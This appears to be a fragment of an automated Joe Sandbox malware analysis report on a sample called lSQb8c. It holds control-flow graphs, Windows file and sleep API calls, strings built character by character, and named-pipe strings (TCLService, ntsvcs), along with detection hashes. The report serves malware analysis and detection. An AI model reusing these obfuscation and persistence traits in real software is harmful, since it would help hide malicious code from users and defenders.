224->228 229 2924557-2924561 224->229 225->176 236 29245bf-29245c6 225->236 231 2924132-292414c 226->231 232 2924126-2924130 226->232 230 2924580-2924582 228->230 229->230 230->225 234 2924584-2924589 230->234 235 2924152-2924154 231->235 232->235 237 2924597-292459f 234->237 238 292458b-2924595 234->238 235->194 239 292415a-2924161 235->239 236->176 240 29245cc-29245d4 236->240 237->225 238->225 241 2924163-292416d 239->241 242 292416f-2924189 239->242 240->131 243 29245d6-29245db 240->243 244 292418f-2924191 241->244 242->244 243->131 243->176 244->194 245 2924197-292419e 244->245 246 29241a0-29241aa 245->246 247 29241ac-29241c6 245->247 248 29241cc-29241ce 246->248 247->248 248->194 249 29241d4-29241db 248->249 250 29241e9-2924200 249->250 251 29241dd-29241e7 249->251 252 2924206-2924208 250->252 251->252 252->194 253 292420e-2924215 252->253 254 2924223-2924239 253->254 255 2924217-2924221 253->255 256 292423f-2924241 254->256 255->256 256->194 257 2924247-292424e 256->257 258 2924250-292425a 257->258 259 292425c-2924273 257->259 260 2924279-292427b 258->260 259->260 260->194 261 2924281-2924288 260->261 262 2924296-29242ac 261->262 263 292428a-2924294 261->263 264 29242b2-29242b4 262->264 263->264 264->194 265 29242ba-29242c0 264->265 266 29242c2-29242cc 265->266 267 29242ce-29242fd call 2936e30 265->267 268 2924303-2924305 266->268 267->268 268->194 271 292430b-2924312 268->271 272 2924320-2924337 271->272 273 2924314-292431e 271->273 274 292433d-292433f 272->274 273->274 274->194 275 2924345-292434c 274->275 276 292435a-2924371 275->276 277 292434e-2924358 275->277 278 2924377-2924379 276->278 277->278 278->194 279 292437f-2924386 278->279 280 2924394-29243ab 279->280 281 2924388-2924392 279->281 282 29243b1-29243b3 280->282 281->282 282->194 283 29243b9-29243c0 282->283 284 29243c2-29243cc 283->284 285 29243ce-29243e5 283->285 286 29243eb-29243ed 284->286 285->286 286->194 287 29243f3-29243fa 286->287 288 2924408-292441f 287->288 289 29243fc-2924406 287->289 290 2924425-2924427 288->290 289->290 290->194 291 2924429-2924430 290->291 292 2924432-292443c 291->292 293 292443e-2924455 291->293 294 292445b-292445d 292->294 293->294 294->194 295 292445f-2924466 294->295 296 2924474-292447c 295->296 297 2924468-2924472 295->297 296->194 297->194
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3257096209.0000000002921000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                    • Associated: 00000005.00000002.3257082753.0000000002920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257127672.0000000002944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257140557.0000000002946000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257153234.0000000002948000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257176832.000000000297C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257192131.0000000002982000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257305709.0000000002B75000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2920000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TCLService$\\.\pipe\%s$ntsvcs
                                                    • API String ID: 0-2389069860
                                                    • Opcode ID: 9ce378ffc334aa1f3064788d5ccccf7b72589864bcfa7db8e2960fb42a03e0c3
                                                    • Instruction ID: 2ed39d86a1a53f5f449203377ed8dbd70ee60ac52531df79b39633d0fd171e2b
                                                    • Opcode Fuzzy Hash: 9ce378ffc334aa1f3064788d5ccccf7b72589864bcfa7db8e2960fb42a03e0c3
                                                    • Instruction Fuzzy Hash: 223216B26082D38EEB34CF35D9443E937A6F39434CF449539C60A8AE4CEBB5D6499B41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 62 56dc75-56ddbd call 567f45 * 2 GetFileAttributesA 67 56ddc3-56ddcc 62->67 68 56ddbf-56ddc1 62->68 70 56ddd2-56ddef SetFileAttributesA 67->70 71 56ddce-56ddd0 67->71 69 56ddfa-56de01 68->69 72 56ddf5 70->72 73 56ddf1-56ddf3 70->73 71->69 72->69 73->69
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32 ref: 0056DDB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: .$2$3$A$A$A$A$F$F$G$S$b$b$d$e$e$e$e$e$e$e$e$i$i$i$i$k$l$l$l$l$l$n$r$r$r$s$s$t$t$t$t$t$t$t$t$u$u
                                                    • API String ID: 3188754299-970789115
                                                    • Opcode ID: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
                                                    • Instruction ID: cc12e86d2e8759de8de086e6cd39831d428fb8162ca965f4390765be517c246a
                                                    • Opcode Fuzzy Hash: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
                                                    • Instruction Fuzzy Hash: 8B516E2050C7C0CAE352D628844875BFFE26BA6748F484D9DA1C98A392D7BF9558C727

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 74 56aec5-56b035 call 567f45 * 3 CreateFileA 81 56b037-56b05f WriteFile 74->81 82 56b068-56b06f 74->82 83 56b067 81->83 83->82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: File$CreateWrite
                                                    • String ID: A$C$C$F$F$H$W$a$a$d$e$e$e$e$e$e$e$i$i$i$l$l$l$l$n$o$r$r$s$t$t
                                                    • API String ID: 2263783195-3987612189
                                                    • Opcode ID: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
                                                    • Instruction ID: d48a15fcd790eec0ae1f33323ef68ee6ff2e34e88de072f9b7e29c3ccc98c424
                                                    • Opcode Fuzzy Hash: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
                                                    • Instruction Fuzzy Hash: BF41DC3010C7C4CEE361DB28C44875BFFD1ABA6708F18495DA1D9872A2CBBA8558CB67

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 84 568735-568828 call 567f45 * 2 SleepEx 90 568830-568853 84->90 91 568855-56885a 90->91 92 56885e 90->92 93 568860-568864 91->93 92->93
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: .$2$3$4$6$C$G$S$T$c$d$e$e$e$e$e$i$k$k$l$l$l$l$n$n$o$p$r$t$t$u
                                                    • API String ID: 3472027048-1678096204
                                                    • Opcode ID: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
                                                    • Instruction ID: b1c19b2f8b4da6174902984dedb70f4fa18c25e35acd9fdd0d78c1fae712c57c
                                                    • Opcode Fuzzy Hash: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
                                                    • Instruction Fuzzy Hash: FB418E2050C7C48AE742D668C448B5FFFD2ABA6748F48099DB0C98B392C6FAC558C767

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 94 568645-568714 call 567f45 GetFileAttributesA 97 568716-56871f 94->97 98 568728 94->98 97->98 99 568721-568726 97->99 100 56872a-56872e 98->100 99->100
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32 ref: 00568707
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: .$2$3$A$A$F$G$b$d$e$e$e$e$e$i$i$k$l$l$l$l$n$r$r$s$t$t$t$t$u
                                                    • API String ID: 3188754299-2392786682
                                                    • Opcode ID: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
                                                    • Instruction ID: 627c067acc8f5444bea51b2e7cdc6a429b1197f39e1c3ab489f4ae1328da9e3f
                                                    • Opcode Fuzzy Hash: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
                                                    • Instruction Fuzzy Hash: 7A31522040C7C0D9E362D628848875FBEE16BA3749F881A9DF2C45A292D7FF9558C727

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(?,-00000003,0056D21F), ref: 0056A466
                                                      • Part of subcall function 0056DC75: GetFileAttributesA.KERNEL32 ref: 0056DDB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AttributesCreateDirectoryFile
                                                    • String ID: A$C$D$a$b.qqqq\:v$c$e$e$e$i$o$peelS$r$r$r$t$t$y
                                                    • API String ID: 3401506121-3195934931
                                                    • Opcode ID: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
                                                    • Instruction ID: 6d90bc80cd5afd29cda39feabb4232516a0646ec4f37676edda230a2a7319232
                                                    • Opcode Fuzzy Hash: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
                                                    • Instruction Fuzzy Hash: D0413E3101C7888BD706E718D448ADBBBD2FBE5304F044A5DB0CAD7296DAB99A48C797

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 357 56a515-56a94d call 56dfd5 call 567f45 * 8 376 56a954-56a959 357->376 377 56abe4-56abef 376->377 378 56a95f-56a96c 376->378 378->377 379 56a972-56a9b4 378->379 381 56a9ba-56a9f9 379->381 382 56abcb-56abd0 379->382 386 56a9ff-56aa1b 381->386 387 56abbb-56abca 381->387 383 56abd2-56abde 382->383 384 56abdf 382->384 383->384 384->376 389 56aa26-56aa4a 386->389 387->382 392 56ab62-56ab6a 389->392 393 56aa50-56aa55 389->393 394 56ab77-56ab80 392->394 393->392 395 56aa5b-56aa6e 393->395 396 56ab82-56aba3 394->396 397 56abab-56abba 394->397 398 56aa74-56aac8 395->398 399 56ab29-56ab71 call 56a0a5 395->399 396->397 397->387 406 56ab1f-56ab27 398->406 407 56aaca-56ab1d call 56a0a5 398->407 399->389 399->394 406->394 407->399
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$A$A$A$C$F$F$GAOrI$H$H$H$HpS$I$I$I$I$O$O$R$S$U$a$a$a$a$c$c$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$i$i$i$l$l$l$l$l$l$l$l$l$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$w
                                                    • API String ID: 0-515521434
                                                    • Opcode ID: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
                                                    • Instruction ID: dc4af3a042cc10463b25121eae1d85e280b1823c2b6043318382371d6cd6f011
                                                    • Opcode Fuzzy Hash: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
                                                    • Instruction Fuzzy Hash: 5E02A43010C7C4CEE772DB28C44879BBFD2ABA6709F04495DA1CD87292CBBA5598C763
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3256571563.0000000000567000.00000040.00000020.00020000.00000000.sdmp, Offset: 00567000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_567000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
                                                    • Instruction ID: ef011e6a6829f28ef1757447611eed13278b02dc9b0ccacb56be908cae437292
                                                    • Opcode Fuzzy Hash: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
                                                    • Instruction Fuzzy Hash: F5D0C714330E290DF71C011C1D6D374F5C1F798982F90466A9416E25D1D845D4D14192